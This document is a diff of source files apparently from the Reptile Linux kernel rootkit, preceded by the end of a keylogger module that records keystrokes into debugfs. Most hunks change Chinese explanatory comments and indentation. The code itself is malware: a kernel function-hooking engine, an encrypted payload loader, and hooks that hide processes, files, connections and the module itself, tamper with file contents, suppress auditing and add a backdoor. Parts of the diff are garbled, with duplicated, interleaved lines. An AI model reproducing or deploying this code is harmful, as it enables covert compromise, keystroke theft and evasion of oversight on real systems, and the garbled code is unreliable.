 	subdir = debugfs_create_dir("kisni", NULL);
 	if (IS_ERR(subdir))
 		return PTR_ERR(subdir);
 	if (!subdir)
 		return -ENOENT;
 	file = debugfs_create_file("keys", S_IRUSR, subdir, NULL, &keys_fops);
 	if (!file) {
 		debugfs_remove_recursive(subdir);
 		return -ENOENT;
 	}
 	register_keyboard_notifier(&keysniffer_blk);
 	return 0;
 }
 static void __exit keysniffer_exit(void)
 {
 	unregister_keyboard_notifier(&keysniffer_blk);
 	debugfs_remove_recursive(subdir);
 }
 module_init(keysniffer_init);
 module_exit(keysniffer_exit);
--- a/src/Reptile/kernel/khook/engine.c
+++ b/src/Reptile/kernel/khook/engine.c
@ -1,202 +1,154 @@
 //内核级别的挂钩（hook）机制，主要用于在Linux内核中动态修改函数行为
 #include "internal.h"
 static khook_stub_t *khook_stub_tbl = NULL;
 ////////////////////////////////////////////////////////////////////////////////
-/*
+//通过内核符号表查找目标函数的地址
 * 内核符号表查找函数callback function
 * 通过遍历data数组中的元素，并与name字符串进行比较
 * 如果找到匹配的元素，则将data数组的第二个元素设置为addr，并返回1
 * 如果遍历完整个数组仍然没有找到匹配的元素，则返回0
 */
 static int khook_lookup_cb(long data[], const char *name, void *module, long addr)
 {
-    int i = 0; 
+	int i = 0; while (!module && (((const char *)data[0]))[i] == name[i]) {
-    while (!module && (((const char *)data[0]))[i] == name[i]) {
+		if (!name[i++]) return !!(data[1] = addr);
-        if (!name[i++]) return !!(data[1] = addr); // 找到匹配的符号，设置地址并返回1
+	} return 0;
    } 
    return 0; // 未找到匹配的符号，返回0
 }
 /*
 * 利用kallsyms_on_each_symbol可以查询符号表，只需要传入查询函数就可以了
 * data[0]表示要查询的地址
 * data[1]表示结果
 * kernel all symbols 内核符号表
 */
 static void *khook_lookup_name(const char *name)
 {
-    long data[2] = { (long)name, 0 };
+	long data[2] = { (long)name, 0 };
-    kallsyms_on_each_symbol((void *)khook_lookup_cb, data);
+	kallsyms_on_each_symbol((void *)khook_lookup_cb, data);
-    return (void *)data[1]; // 返回找到的符号地址
+	return (void *)data[1];
 }
-
+//将目标函数地址映射为可写内存，以便修改其代码
 /*
 * 将一个虚拟地址范围[addr, addr + len]映射到 可写 内核内存区域
 */
 static void *khook_map_writable(void *addr, size_t len)
 {
-    struct page *pages[2] = { 0 }; // len << PAGE_SIZE
+	struct page *pages[2] = { 0 }; // len << PAGE_SIZE
-    long page_offset = offset_in_page(addr);
+	long page_offset = offset_in_page(addr);
-    int i, nb_pages = DIV_ROUND_UP(page_offset + len, PAGE_SIZE);
+	int i, nb_pages = DIV_ROUND_UP(page_offset + len, PAGE_SIZE);
-
+
-    addr = (void *)((long)addr & PAGE_MASK); // 对齐地址到页面边界
+	addr = (void *)((long)addr & PAGE_MASK);
-    for (i = 0; i < nb_pages; i++, addr += PAGE_SIZE) {
+	for (i = 0; i < nb_pages; i++, addr += PAGE_SIZE) {
-        if ((pages[i] = is_vmalloc_addr(addr) ?
+		if ((pages[i] = is_vmalloc_addr(addr) ?
-             vmalloc_to_page(addr) : virt_to_page(addr)) == NULL)
+		     vmalloc_to_page(addr) : virt_to_page(addr)) == NULL)
-            return NULL; // 如果无法获取页面，返回NULL
+			return NULL;
-    }
+	}
-
+
-    addr = vmap(pages, nb_pages, VM_MAP, PAGE_KERNEL); // 映射页面到内核地址空间
+	addr = vmap(pages, nb_pages, VM_MAP, PAGE_KERNEL);
-    return addr ? addr + page_offset : NULL; // 返回映射后的地址
+	return addr ? addr + page_offset : NULL;
 }
 ////////////////////////////////////////////////////////////////////////////////
 #ifdef CONFIG_X86
-# include "x86/hook.c" // 包含x86架构相关的钩子实现
+# include "x86/hook.c"
 #else
-# error Target CPU architecture is NOT supported !!! // 不支持的CPU架构
+# error Target CPU architecture is NOT supported !!!
 #endif
 ////////////////////////////////////////////////////////////////////////////////
-
+//挂钩唤醒
 /*
 * 唤醒所有进程
 */
 static void khook_wakeup(void)
 {
-    struct task_struct *p;
+	struct task_struct *p;
-    rcu_read_lock();
+	rcu_read_lock();
-    for_each_process(p) {
+	for_each_process(p) {
-        wake_up_process(p); // 唤醒进程
+		wake_up_process(p);
-    }
+	}
-    rcu_read_unlock();
+	rcu_read_unlock();
 }
-
+//初始化和清理挂钩
 /*
 * 初始化所有钩子
 */
 static int khook_sm_init_hooks(void *arg)
 {
-    khook_t *p;
+	khook_t *p;
-    KHOOK_FOREACH_HOOK(p) {
+	KHOOK_FOREACH_HOOK(p) {
-        if (!p->target.addr_map) continue;
+		if (!p->target.addr_map) continue;
-        khook_arch_sm_init_one(p); // 初始化单个钩子
+		khook_arch_sm_init_one(p);
-    }
+	}
-    return 0;
+	return 0;
 }
 /*
 * 清理所有钩子
 */
 static int khook_sm_cleanup_hooks(void *arg)
 {
-    khook_t *p;
+	khook_t *p;
-    KHOOK_FOREACH_HOOK(p) {
+	KHOOK_FOREACH_HOOK(p) {
-        if (!p->target.addr_map) continue;
+		if (!p->target.addr_map) continue;
-        khook_arch_sm_cleanup_one(p); // 清理单个钩子
+		khook_arch_sm_cleanup_one(p);
-    }
+	}
-    return 0;
+	return 0;
 }
 /*
 * 解析所有钩子的目标地址
 */
 static void khook_resolve(void)
 {
-    khook_t *p;
+	khook_t *p;
-    KHOOK_FOREACH_HOOK(p) {
+	KHOOK_FOREACH_HOOK(p) {
-        p->target.addr = khook_lookup_name(p->target.name); // 查找符号地址
+		p->target.addr = khook_lookup_name(p->target.name);
-    }
+	}
 }
 /*
 * 映射所有钩子的目标地址到可写内存区域
 */
 static void khook_map(void)
 {
-    khook_t *p;
+	khook_t *p;
-    KHOOK_FOREACH_HOOK(p) {
+	KHOOK_FOREACH_HOOK(p) {
-        if (!p->target.addr) continue;
+		if (!p->target.addr) continue;
-        p->target.addr_map = khook_map_writable(p->target.addr, 32); // 映射地址
+		p->target.addr_map = khook_map_writable(p->target.addr, 32);
-        khook_debug("target %s@%p -> %p\n", p->target.name, p->target.addr, p->target.addr_map);
+		khook_debug("target %s@%p -> %p\n", p->target.name, p->target.addr, p->target.addr_map);
-    }
+	}
 }
 /*
 * 取消映射所有钩子的目标地址
 */
 static void khook_unmap(int wait)
 {
-    khook_t *p;
+	khook_t *p;
-    KHOOK_FOREACH_HOOK(p) {
+	KHOOK_FOREACH_HOOK(p) {
-        khook_stub_t *stub = KHOOK_STUB(p);
+		khook_stub_t *stub = KHOOK_STUB(p);
-        if (!p->target.addr_map) continue;
+		if (!p->target.addr_map) continue;
-        while (wait && atomic_read(&stub->use_count) > 0) {
+		while (wait && atomic_read(&stub->use_count) > 0) {
-            khook_wakeup(); // 唤醒进程
+			khook_wakeup();
-            msleep_interruptible(1000); // 休眠1秒
+			msleep_interruptible(1000);
-            khook_debug("waiting for %s...\n", p->target.name);
+			khook_debug("waiting for %s...\n", p->target.name);
-        }
+		}
-        vunmap((void *)((long)p->target.addr_map & PAGE_MASK)); // 取消映射
+		vunmap((void *)((long)p->target.addr_map & PAGE_MASK));
-        p->target.addr_map = NULL;
+		p->target.addr_map = NULL;
-    }
+	}
 }
 ////////////////////////////////////////////////////////////////////////////////
-/* khook_init()和khook_cleanup()对挂钩引擎进行初始化和注销 */
+
 /*
 * 初始化挂钩引擎
 * 1. malloc分配内存空间用于存储钩子函数的桩（stub）
 * 2. khook_resolve查找并解析内核符号表
 * 3. 映射目标地址到可写的内核内存区域
 * 4. 调用stop_machine函数，将钩子函数的初始化工作交给内核调度器执行
 */
 int khook_init(void)
 {
-    void *(*malloc)(long size) = NULL;
+	void *(*malloc)(long size) = NULL;
-    int   (*set_memory_x)(unsigned long, int) = NULL;
+	int   (*set_memory_x)(unsigned long, int) = NULL;
-    malloc = khook_lookup_name("module_alloc");
+	malloc = khook_lookup_name("module_alloc");
-    if (!malloc || KHOOK_ARCH_INIT()) return -EINVAL;
+	if (!malloc || KHOOK_ARCH_INIT()) return -EINVAL;
-    khook_stub_tbl = malloc(KHOOK_STUB_TBL_SIZE);
+	khook_stub_tbl = malloc(KHOOK_STUB_TBL_SIZE);
-    if (!khook_stub_tbl) return -ENOMEM;
+	if (!khook_stub_tbl) return -ENOMEM;
-    memset(khook_stub_tbl, 0, KHOOK_STUB_TBL_SIZE);
+	memset(khook_stub_tbl, 0, KHOOK_STUB_TBL_SIZE);
-    //
+	//
-    // Since some point memory allocated by module_alloc() doesn't
+	// Since some point memory allocated by module_alloc() doesn't
-    // have eXecutable attributes. That's why we have to mark the
+	// have eXecutable attributes. That's why we have to mark the
-    // region executable explicitly.
+	// region executable explicitly.
-    //
+	//
-    set_memory_x = khook_lookup_name("set_memory_x");
+	set_memory_x = khook_lookup_name("set_memory_x");
-    if (set_memory_x) {
+	if (set_memory_x) {
-        int numpages = round_up(KHOOK_STUB_TBL_SIZE, PAGE_SIZE) / PAGE_SIZE;
+		int numpages = round_up(KHOOK_STUB_TBL_SIZE, PAGE_SIZE) / PAGE_SIZE;
-        set_memory_x((unsigned long)khook_stub_tbl, numpages);
+		set_memory_x((unsigned long)khook_stub_tbl, numpages);
-    }
+	}
-    khook_resolve(); // 解析符号表
+	khook_resolve();
-    khook_map(); // 映射地址
+	khook_map();
-    stop_machine(khook_sm_init_hooks, NULL, NULL); // 初始化钩子
+	stop_machine(khook_sm_init_hooks, NULL, NULL);
-    khook_unmap(0); // 取消映射
+	khook_unmap(0);
-    return 0;
+	return 0;
 }
 /*
 * 注销挂钩引擎
 * 1. 映射目标地址到可写的内核内存区域
 * 2. 调用stop_machine函数，将钩子函数的清理工作交给内核调度器执行
 * 3. 取消映射目标地址
 * 4. 释放分配的内存空间
 */
 void khook_cleanup(void)
 {
-    khook_map(); // 映射地址
+	khook_map();
-    stop_machine(khook_sm_cleanup_hooks, NULL, NULL); // 清理钩子
+	stop_machine(khook_sm_cleanup_hooks, NULL, NULL);
-    khook_unmap(1); // 取消映射
+	khook_unmap(1);
-    vfree(khook_stub_tbl); // 释放内存
+	vfree(khook_stub_tbl);
-}
+}
--- a/src/Reptile/kernel/khook/engine.h
+++ b/src/Reptile/kernel/khook/engine.h
@ -4,15 +4,6 @@
 #define KHOOK_F_NOREF		(1UL << 0)	// don't do auto ref-count
 /*
 * 内核钩子结构体
 * fn：钩子函数
 * name：符号名字
 * addr：符号地址
 * addr_map：符号地址被映射的虚拟地址
 * orig：原函数
 */
 typedef struct {
 	void			*fn;		// handler fn address
 	struct {
@ -24,13 +15,6 @@ typedef struct {
 	unsigned long		flags;		// hook engine options (flags)
 } khook_t;
 /*
 * 格式规定：假设原函数名字为fun，则自定义的fun的钩子函数名字必须为khook_fun
 * 编译器选项：
 * __attribute__((unused)表示可能不会用到
 * __attribute__((aligned(1)))表示一字节对齐
 * __attribute__((section(".data.khook")))表示这个结构需要被分配到.data.khook节中
 */
 #define KHOOK_(t, f)							\
 	static inline typeof(t) khook_##t; /* forward decl */		\
 	khook_t								\
--- a/src/Reptile/kernel/khook/engine.lds
+++ b/src/Reptile/kernel/khook/engine.lds
@ -6,8 +6,3 @@ SECTIONS
 		KHOOK_tbl_end = . ;
 	}
 }
 In engine.c, all hooks are allocated to the .data.khook section.
 The above script means that all contents of .data.khook are placed in the .data section.
 The '.' character represents the current location counter, so KHOOK_tbl points to the beginning of .data.khook, and KHOOK_tbl_end points to the end of KHOOK_tbl_end.
 These two variables represent the start and end addresses of the hook table, KHOOK_tbl and KHOOK_tbl_end.
--- a/src/Reptile/kernel/khook/internal.h
+++ b/src/Reptile/kernel/khook/internal.h
@ -20,11 +20,6 @@ extern khook_t KHOOK_tbl_end[];
 #define KHOOK_FOREACH_HOOK(p)		\
 	for (p = KHOOK_tbl; p < KHOOK_tbl_end; p++)
 /*
 * 一个钩子函数一定会有一个STUB
 * 而这个STUB会被初始化为stub.inc或stub32.inc。也就是stub的模板 
 * 将原始数据和钩子数据存储在同一个结构体中
 */
 typedef struct {
 #pragma pack(push, 1)
 	union {
--- a/src/Reptile/kernel/khook/x86/hook.c
+++ b/src/Reptile/kernel/khook/x86/hook.c
@ -1,3 +1,4 @@
 //内核中实现x86架构下的函数钩子（hook）
 #include "../internal.h"
 ////////////////////////////////////////////////////////////////////////////////
@ -6,19 +7,11 @@
 #include <asm/insn.h>
 /*
 * typeof 是 GCC的一个扩展关键字
 * 它用于在预处理阶段确定一个变量或表达式的类型
 * 而不需要实际创建该变量或表达式的实例
 */
 static struct {
 	typeof(insn_init) *init;
 	typeof(insn_get_length) *get_length;
 } khook_arch_lde;
-
+//初始化长度解析引擎
 /*
 *初始化函数，用于查找并初始化 insn_init 和 insn_get_length 函数的地址
 */
 static inline int khook_arch_lde_init(void) {
 	khook_arch_lde.init = khook_lookup_name("insn_init");
 	if (!khook_arch_lde.init) return -EINVAL;
@ -26,12 +19,7 @@ static inline int khook_arch_lde_init(void) {
 	if (!khook_arch_lde.get_length) return -EINVAL;
 	return 0;
 }
-
+//获取指令长度
 /*
 * 获取地址p的指令的长度
 * 先调用insn_init获得insn结构
 * 然后调用get_length得到指令长度，结果存放在insn的length字段
 */
 static inline int khook_arch_lde_get_length(const void *p) {
 	struct insn insn;
 	int x86_64 = 0;
@ -48,43 +36,37 @@ static inline int khook_arch_lde_get_length(const void *p) {
 }
 ////////////////////////////////////////////////////////////////////////////////
-
+//插入跳转指令
 // place a jump at addr @a from addr @f to addr @t
 static inline void x86_put_jmp(void *a, void *f, void *t)
 {
-	*((char *)(a + 0)) = 0xE9; //跳转指令的Opcode
+	*((char *)(a + 0)) = 0xE9;
-	*(( int *)(a + 1)) = (long)(t - (f + 5)); //偏移计算
+	*(( int *)(a + 1)) = (long)(t - (f + 5));
 }
 static const char khook_stub_template[] = {
 # include KHOOK_STUB_FILE_NAME
 };
-
+//修复函数钩子中的占位符，
 static inline void stub_fixup(void *stub, const void *value) {
 	while (*(int *)stub != 0xcacacaca) stub++;
 	*(long *)stub = (long)value;
 }
-
+//初始化单个钩子
 /*
 * 初始化一个钩子
 * 使其能够在特定条件下跳转到新的函数地址
 * 同时保留原始指令以便在需要时恢复
 */
 static inline void khook_arch_sm_init_one(khook_t *hook) {
 	khook_stub_t *stub = KHOOK_STUB(hook);
 	// 跳转指令的第一个字节是0xE9或0xCC，表示已经被hook过了
 	if (hook->target.addr[0] == (char)0xE9 ||
 	    hook->target.addr[0] == (char)0xCC) return;
 	BUILD_BUG_ON(sizeof(khook_stub_template) > offsetof(khook_stub_t, nbytes));
-	memcpy(stub, khook_stub_template, sizeof(khook_stub_template)); // 拷贝模板到stub中
+	memcpy(stub, khook_stub_template, sizeof(khook_stub_template));
 	stub_fixup(stub->hook, hook->fn);
 	while (stub->nbytes < 5)
 		stub->nbytes += khook_arch_lde_get_length(hook->target.addr + stub->nbytes);
-	memcpy(stub->orig, hook->target.addr, stub->nbytes); // 拷贝hook原函数到stub的orig中
+	memcpy(stub->orig, hook->target.addr, stub->nbytes);
-	x86_put_jmp(stub->orig + stub->nbytes, stub->orig + stub->nbytes, hook->target.addr + stub->nbytes); // 设置跳转
+	x86_put_jmp(stub->orig + stub->nbytes, stub->orig + stub->nbytes, hook->target.addr + stub->nbytes);
 	if (hook->flags & KHOOK_F_NOREF) {
 		x86_put_jmp(hook->target.addr_map, hook->target.addr, hook->fn);
 	} else {
@ -92,11 +74,7 @@ static inline void khook_arch_sm_init_one(khook_t *hook) {
 	}
 	hook->orig = stub->orig; // the only link from hook to stub
 }
-
+//清理单个钩子
 /*
 * 清理一个钩子
 * 将目标地址恢复为原始指令
 */
 static inline void khook_arch_sm_cleanup_one(khook_t *hook) {
 	khook_stub_t *stub = KHOOK_STUB(hook);
 	memcpy(hook->target.addr_map, stub->orig, stub->nbytes);
--- a/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
+++ b/src/Reptile/kernel/kmatryoshka/kmatryoshka.c
@ -1,3 +1,4 @@
 //内核模块的初始化
 #include <linux/kallsyms.h>
 #include <linux/kernel.h>
 #include <linux/module.h>
@ -9,92 +10,76 @@
 #include "encrypt.h"
 // 定义 SYS_INIT_MODULE 宏，用于生成 "sys_init_module" 字符串
 #define SYS_INIT_MODULE                                 \
-    ({                                              \
+	({                                              \
-        unsigned int *p = __builtin_alloca(16); \
+		unsigned int *p = __builtin_alloca(16); \
-        p[0] = 0x5f737973;                      \
+		p[0] = 0x5f737973;                      \
-        p[1] = 0x74696e69;                      \
+		p[1] = 0x74696e69;                      \
-        p[2] = 0x646f6d5f;                      \
+		p[2] = 0x646f6d5f;                      \
-        p[3] = 0x00656c75;                      \
+		p[3] = 0x00656c75;                      \
-        (char *)p;                              \
+		(char *)p;                              \
-    })
+	})
-
+
 // 定义 __DO_SYS_INIT_MODULE 宏，用于生成 "__do_sys_init_module" 字符串
 #define __DO_SYS_INIT_MODULE                            \
-    ({                                              \
+	({                                              \
-        unsigned int *p = __builtin_alloca(24); \
+		unsigned int *p = __builtin_alloca(24); \
-        p[0] = 0x6f645f5f;                      \
+		p[0] = 0x6f645f5f;                      \
-        p[1] = 0x7379735f;                      \
+		p[1] = 0x7379735f;                      \
-        p[2] = 0x696e695f;                      \
+		p[2] = 0x696e695f;                      \
-        p[3] = 0x6f6d5f74;                      \
+		p[3] = 0x6f6d5f74;                      \
-        p[4] = 0x656c7564;                      \
+		p[4] = 0x656c7564;                      \
-        p[5] = 0x00000000;                      \
+		p[5] = 0x00000000;                      \
-        (char *)p;                              \
+		(char *)p;                              \
-    })
+	})
-
+
 // 包含 parasite_blob.inc 文件中的数据
 static char parasite_blob[] = {
 #include "parasite_blob.inc"
 };
 // 内核符号表查找函数的回调函数
 static int ksym_lookup_cb(unsigned long data[], const char *name, void *module,
-              unsigned long addr)
+			  unsigned long addr)
 {
-    int i = 0;
+	int i = 0;
-    while (!module && (((const char *)data[0]))[i] == name[i]) {
+	while (!module && (((const char *)data[0]))[i] == name[i]) {
-        if (!name[i++])
+		if (!name[i++])
-            return !!(data[1] = addr); // 找到匹配的符号，设置地址并返回1
+			return !!(data[1] = addr);
-    }
+	}
-    return 0; // 未找到匹配的符号，返回0
+	return 0;
 }
 // 查找符号表中的符号地址
 static inline unsigned long ksym_lookup_name(const char *name)
 {
-    unsigned long data[2] = {(unsigned long)name, 0};
+	unsigned long data[2] = {(unsigned long)name, 0};
-    kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); // 实现在khook/engine.c中
+	kallsyms_on_each_symbol((void *)ksym_lookup_cb, data);
-    return data[1]; // 返回找到的符号地址
+	return data[1];
 }
 /*
 * init_module函数的系统调用处理函数sys_init_module
 * 它是一个导出函数，通过ksym_lookup_name得到该函数的地址
 */
 int init_module(void)
 {
-    int ret = -EINVAL;
+	int ret = -EINVAL;
-    asmlinkage long (*sys_init_module)(const void *, unsigned long, const char *) = NULL;
+	asmlinkage long (*sys_init_module)(const void *, unsigned long, const char *) = NULL;
-    // 解密 parasite_blob 数据
+	do_decrypt(parasite_blob, sizeof(parasite_blob), DECRYPT_KEY);
    do_decrypt(parasite_blob, sizeof(parasite_blob), DECRYPT_KEY);
-    // 查找 sys_init_module 函数的地址
+	sys_init_module = (void *)ksym_lookup_name(SYS_INIT_MODULE);
    sys_init_module = (void *)ksym_lookup_name(SYS_INIT_MODULE);
-    if (!sys_init_module)
+	if (!sys_init_module)
-        sys_init_module = (void *)ksym_lookup_name(__DO_SYS_INIT_MODULE);
+		sys_init_module = (void *)ksym_lookup_name(__DO_SYS_INIT_MODULE);
-    if (sys_init_module) {
+	if (sys_init_module) {
-        const char *nullarg = parasite_blob;
+		const char *nullarg = parasite_blob;
-        unsigned long seg = user_addr_max();
+		unsigned long seg = user_addr_max();
-        // 找到 parasite_blob 中的空字符
+		while (*nullarg)
-        while (*nullarg)
+			nullarg++;
            nullarg++;
-        // 设置用户地址空间的最大值
+		user_addr_max() = roundup((unsigned long)parasite_blob + sizeof(parasite_blob), PAGE_SIZE);
-        user_addr_max() = roundup((unsigned long)parasite_blob + sizeof(parasite_blob), PAGE_SIZE);
+		if(sys_init_module(parasite_blob, sizeof(parasite_blob), nullarg) == 0) ret = -37; // would be 1337, but is too obvious. hahaha
-        if(sys_init_module(parasite_blob, sizeof(parasite_blob), nullarg) == 0) ret = -37; // would be 1337, but is too obvious. hahaha
+		user_addr_max() = seg;
-        user_addr_max() = seg; // 恢复用户地址空间的最大值
+	}
    }
-    return ret;
+	return ret;
 }
 /*
 * 表示该模块是内核树的一部分，即它是内核的内置模块，而不是一个外部模块。当内核配置为包含该模块时，它将被编译并包含在内核二进制文件中
 */
 MODULE_LICENSE("GPL");
-MODULE_INFO(intree, "Y");
+MODULE_INFO(intree, "Y");
--- a/src/Reptile/kernel/loader/loader.c
+++ b/src/Reptile/kernel/loader/loader.c
@ -1,3 +1,4 @@
 //加载所需模块
 #define _GNU_SOURCE
 #include <errno.h>
 #include <fcntl.h>
@ -34,4 +35,4 @@ int main(void)
 	free(module_image);
 	return ret;
-}
+}
--- a/src/Reptile/kernel/main.c
+++ b/src/Reptile/kernel/main.c
@ -11,7 +11,7 @@
 int hidden = 1;
-/* ------------------------ 隐藏进程 ------------------------- */
+/* ------------------------ HIDE PROCESS ------------------------- */
 #ifdef CONFIG_HIDE_PROC
@ -25,7 +25,7 @@ static int khook_copy_creds(struct task_struct *p, unsigned long clone_flags)
 	ret = KHOOK_ORIGIN(copy_creds, p, clone_flags);
 	if (!ret && is_task_invisible(current))
-		p->flags |= FLAG; // 如果任务不可见，设置标志
+		p->flags |= FLAG;
 	return ret;
 }
@ -35,7 +35,7 @@ static void khook_exit_creds(struct task_struct *p)
 {
 	KHOOK_ORIGIN(exit_creds, p);
 	if (is_task_invisible(p))
-		p->flags &= ~FLAG; // 如果任务不可见，清除标志
+		p->flags &= ~FLAG;
 }
 KHOOK(audit_alloc);
@ -44,7 +44,7 @@ static int khook_audit_alloc(struct task_struct *t)
 	int err = 0;
 	if (is_task_invisible(t)) {
-		clear_tsk_thread_flag(t, TIF_SYSCALL_AUDIT); // 如果任务不可见，清除系统调用审计标志
+		clear_tsk_thread_flag(t, TIF_SYSCALL_AUDIT);
 	} else {
 		err = KHOOK_ORIGIN(audit_alloc, t);
 	}
@ -58,7 +58,7 @@ struct task_struct *khook_find_task_by_vpid(pid_t vnr)
 	tsk = KHOOK_ORIGIN(find_task_by_vpid, vnr);
 	if (tsk && is_task_invisible(tsk) && !is_task_invisible(current))
-		tsk = NULL; // 如果任务不可见且当前任务可见，返回NULL
+		tsk = NULL;
 	return tsk;
 }
@ -68,30 +68,30 @@ static int khook_vfs_statx(int dfd, const char __user *filename, int flags, stru
 						u32 request_mask)
 {
 	if (is_proc_invisible_2(filename))
-		return -EINVAL; // 如果进程不可见，返回无效参数错误
+		return -EINVAL;
 	return KHOOK_ORIGIN(vfs_statx, dfd, filename, flags, stat, request_mask);
 }
 KHOOK_EXT(long, sys_kill, long, long);
 static long khook_sys_kill(long pid, long sig) {
-	if (sig == 0) {
+    if (sig == 0) {
 		if (is_proc_invisible(pid)) {
-			return -ESRCH; // 如果进程不可见，返回无此进程错误
+			return -ESRCH;
 		}
 	}
-	
+    
 	return KHOOK_ORIGIN(sys_kill, pid, sig);
 }
 KHOOK_EXT(long, __x64_sys_kill, const struct pt_regs *);
 static long khook___x64_sys_kill(const struct pt_regs *regs) {
-	if (regs->si == 0) {
+    if (regs->si == 0) {
 		if (is_proc_invisible(regs->di)) {
-			return -ESRCH; // 如果进程不可见，返回无此进程错误
+			return -ESRCH;
 		}
 	}
-	
+    
 	return KHOOK_ORIGIN(__x64_sys_kill, regs);
 }
@ -101,7 +101,7 @@ static struct tgid_iter khook_next_tgid(struct pid_namespace *ns, struct tgid_it
 	if (hidden) {
 		while ((iter = KHOOK_ORIGIN(next_tgid, ns, iter), iter.task) != NULL) {
 			if (!(iter.task->flags & FLAG))
-				break; // 跳过不可见任务
+				break;
 			iter.tgid++;
 		}
@ -113,17 +113,20 @@ static struct tgid_iter khook_next_tgid(struct pid_namespace *ns, struct tgid_it
 #endif
-/* ------------------------- 隐藏目录 --------------------------- */
+/* ------------------------- HIDE DIR --------------------------- */
 #ifdef CONFIG_HIDE_DIR
 #include <linux/dcache.h>
 #include "dir.h"
-/* 这些钩子有点问题，但它们能工作，也许将来会改进 */
+/* Can you see a little problem on those hooks? This is not the best 
 * way to do this feature, but I am going to keep it this way, after all,
 * this is just a public project, isn't it?
 */
 KHOOK_EXT(int, fillonedir, void *, const char *, int, loff_t, u64, unsigned int);
 static int khook_fillonedir(void *__buf, const char *name, int namlen,
-				loff_t offset, u64 ino, unsigned int d_type)
+			    loff_t offset, u64 ino, unsigned int d_type)
 {
 	int ret = -ENOENT;
 	if (!strstr(name, HIDE) || !hidden)
@ -198,7 +201,7 @@ struct dentry *khook___d_lookup(struct dentry *parent, struct qstr *name)
 }
 #endif
-/* --------------------- 文件内容篡改 --------------------- */
+/* --------------------- FILE CONTENT TAMPERING --------------------- */
 #ifdef CONFIG_FILE_TAMPERING
@ -207,10 +210,10 @@ struct dentry *khook___d_lookup(struct dentry *parent, struct qstr *name)
 atomic_t read_on;
 int file_tampering_flag = 0;
-// 这不是最好的方法，但它有效，也许将来会改进
+// This is not the best way to do that, but it works, maybe in the future I change that
 KHOOK_EXT(ssize_t, vfs_read, struct file *, char __user *, size_t, loff_t *);
 static ssize_t khook_vfs_read(struct file *file, char __user *buf,
-				  size_t count, loff_t *pos)
+			      size_t count, loff_t *pos)
 {
 	ssize_t ret;
@ -228,7 +231,7 @@ static ssize_t khook_vfs_read(struct file *file, char __user *buf,
 #endif
-/* ------------------------ 隐藏连接 ------------------------- */
+/* ------------------------ HIDE CONNECTIONS ------------------------- */
 #ifdef CONFIG_HIDE_CONN
@ -314,7 +317,7 @@ out:
 #endif
-/* ----------------------------- 后门 ----------------------------- */
+/* ----------------------------- BACKDOOR ----------------------------- */
 #ifdef CONFIG_BACKDOOR
 #include <linux/netdevice.h>
@ -332,7 +335,7 @@ static int khook_ip_rcv(struct sk_buff *skb, struct net_device *dev, struct pack
 #endif
-/* ------------------------------ 通用 ----------------------------- */
+/* ------------------------------ COMMON ----------------------------- */
 #if defined(CONFIG_HIDE_PROC) && defined(CONFIG_BACKDOOR)
 #include <linux/binfmts.h>
@ -349,7 +352,7 @@ static int khook_load_elf_binary(struct linux_binprm *bprm)
 }
 #endif
-/* ------------------------------- 控制 ----------------------------- */
+/* ------------------------------- CONTROL ----------------------------- */
 #include <linux/net.h>
 #include <linux/in.h>
@ -364,7 +367,7 @@ struct control {
 KHOOK_EXT(int, inet_ioctl, struct socket *, unsigned int, unsigned long);
 static int khook_inet_ioctl(struct socket *sock, unsigned int cmd,
-				unsigned long arg)
+			    unsigned long arg)
 {
 	int ret = 0;
 	unsigned int pid;
@ -446,9 +449,10 @@ static int __init reptile_init(void)
 	int ret;
 #ifdef CONFIG_FILE_TAMPERING
-	/* 不幸的是，我需要使用这个来确保在某些内核版本中
+	/* Unfortunately I need to use this to ensure in some kernel
-	 * 我们能够在需要时卸载内核模块。否则，khook可能会
+	 * versions we will be able to unload the kernel module when
-	 * 因为vfs_read钩子而导致卸载时出现很大的延迟
+	 * it is needed. Otherwise khook may take a really huge delay
 	 * to unload because of vfs_read hook
 	 */
 	atomic_set(&read_on, 0);
 #endif
@ -470,11 +474,6 @@ static void __exit reptile_exit(void)
 #ifdef CONFIG_FILE_TAMPERING
 	while(atomic_read(&read_on) != 0) schedule();
 #endif
 #ifdef CONFIG_HIDE_CONN
 	network_hide_cleanup();
 #endif
 	khook_cleanup();
 }
--- a/src/Reptile/kernel/module.c
+++ b/src/Reptile/kernel/module.c
@ -1,103 +1,40 @@
-#include <linux/module.h> // 包含 Linux 内核模块的头文件
+//内核模块隐藏
-#include <linux/mutex.h>  // 包含互斥锁的头文件
+#include <linux/module.h>
-#include <linux/slab.h>   // 包含内存分配的头文件
+#include <linux/mutex.h>
 #include <linux/slab.h>
-#include "module.h" // 包含自定义模块的头文件
+#include "module.h"
-/**
+int hide_m = 0;
 * @file module.c
 * @brief 本文件包含用于隐藏和显示内核模块的函数。
 *
 * 文件中的函数通过操作模块列表及其属性，实现内核模块的隐藏和显示功能。
 */
 /**
 * @brief 标记模块是否被隐藏（1）或可见（0）。
 */
 //int hide_m = 0;
 int flag_hide_m = 0;
 int flag_show_m = 1;
 /**
 * @brief 指向模块列表前一个条目的指针。
 */
 static struct list_head *mod_list;
 /**
 * @brief 隐藏内核模块。
 *
 * 该函数从模块列表中移除模块，并释放其段属性，从而使其在系统中不可见。
 */
 void hide(void);
 /**
 * @brief 显示内核模块。
 *
 * 该函数将模块重新添加到模块列表中，使其在系统中再次可见。
 */
 void show(void);
 /**
 * @brief 切换内核模块的可见性。
 *
 * 该函数在模块当前可见时隐藏模块，在模块当前隐藏时显示模块。
 */
 void hide_module(void);
 void hide(void)
 {
-    // 尝试获取模块互斥锁，如果失败则让CPU放松
+	while (!mutex_trylock(&module_mutex))
-    while (!mutex_trylock(&module_mutex))
+		cpu_relax();
-        cpu_relax();
+	mod_list = THIS_MODULE->list.prev;
-    
+	list_del(&THIS_MODULE->list);
-    // 判断模块是否可见，并设置模块隐藏标志
+	kfree(THIS_MODULE->sect_attrs);
-    if(flag_hide_m == 0 && flag_show_m == 1)
+	THIS_MODULE->sect_attrs = NULL;
-    {   
+	mutex_unlock(&module_mutex);
-        flag_hide_m = 1;
+	
-        flag_show_m = 0;
+	hide_m = 1;
        // 保存当前模块列表的前一个条目
        mod_list = THIS_MODULE->list.prev;
        // 从模块列表中删除当前模块
        list_del(&THIS_MODULE->list);
        // 释放模块的段属性
        kfree(THIS_MODULE->sect_attrs);
        // 将模块的段属性设置为NULL
        THIS_MODULE->sect_attrs = NULL;
        // 释放模块互斥锁
        mutex_unlock(&module_mutex);
    }
 }
 void show(void)
 {
-    // 尝试获取模块互斥锁，如果失败则让CPU放松
